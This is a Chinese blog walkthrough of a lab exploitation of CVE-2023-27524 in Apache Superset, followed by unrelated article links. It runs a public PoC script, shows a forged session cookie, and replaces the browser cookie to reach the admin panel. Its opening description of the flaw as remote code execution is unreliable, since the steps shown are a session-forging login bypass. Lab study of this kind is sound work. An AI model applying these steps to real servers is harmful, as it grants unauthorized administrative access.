当前位置: 首页 > news >正文

ApacheSuperset CVE-2023-27524

news 2025/7/30 10:57:17

前言:CVE-2023-27524 是一种远程代码执行漏洞,攻击者通过该漏洞可在受影响系统上执行任意代码,从而获得未授权访问权

CVE-2023-27524 GitHubhttps://github.com/horizon3ai/CVE-2023-27524

任务一 代理 | 拉取镜像

vi /etc/proxychains4.conf
//最下面修改真机IP端口

 

 

docker compose up -d
docker ps
//拉取成功后查看8088就是服务器端口

 任务二  python 问题解决

python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//发现缺少 ‘flask_unsign’

python3 -m venv myenv
source myenv/bin/activate
//创建并激活一个虚拟环境
//安装 flask-unsign
proxychains4 pip install flask-unsign

任务三 生成cookie

python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//下面这样就是安装成功了【eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.aEAshA.TmTRYFed6TPxFmeOmLRrQAXX3vc】

任务四 替换cookie 

//随便下载一个cookie的小插件 我用的是cookieManage

//替换进去保存,刷新一下就进管理界面了

 

任务五 实验结束 

http://www.lqws.cn/news/141229.html

相关文章:

  • L1-019 谁先倒 (15 分)
  • 慢SQL调优(二):大表查询
  • 《Offer来了:Java面试核心知识点精讲》大纲
  • 10. MySQL索引
  • Android apk装机编译类型: verify、speed-profile, speed与启动耗时
  • BUU MISC(持续更新)
  • [Java 基础]面向对象-继承
  • 得力Deli GE330W打印机信息
  • 如何流畅播放体育电竞赛事?
  • 三角形类CTriangle
  • python打卡day44
  • day 44
  • 【Bluedroid】蓝牙启动之gatt_init 流程源码解析
  • NLP学习路线图(二十二): 循环神经网络(RNN)
  • Linux进程调度:从时间片到实时任务的交响乐
  • 深入理解计算机进制:从原理到 C++ 实现
  • uniapp uni-id-co errCode“:“uni-id-captcha-required“,“errMsg“:“Captcha required
  • [华为eNSP] 在eNSP上实现IPv4地址以及IPv4静态路由的配置
  • kafka命令
  • Oj系统测试报告
  • Postgresql常规SQL语句操作
  • 软件工程:如何在项目中把软件做好
  • linux_centos7.x的ifconfig命令显示内容详解
  • 对抗性提示:大型语言模型的安全性测试
  • 【向量化模型如何私有化部署】一文说清原理、流程与最佳实践
  • 验证负载均衡与弹性伸缩
  • 猎板硬金镀层厚度:新能源汽车高压系统的可靠性基石
  • 【Windows开发】Windows 事件跟踪 (ETW)
  • QGIS新手教程3:QGIS矢量图层导入与导出+Shape Tools插件绘图
  • window 显示驱动开发-提供视频解码功能(二)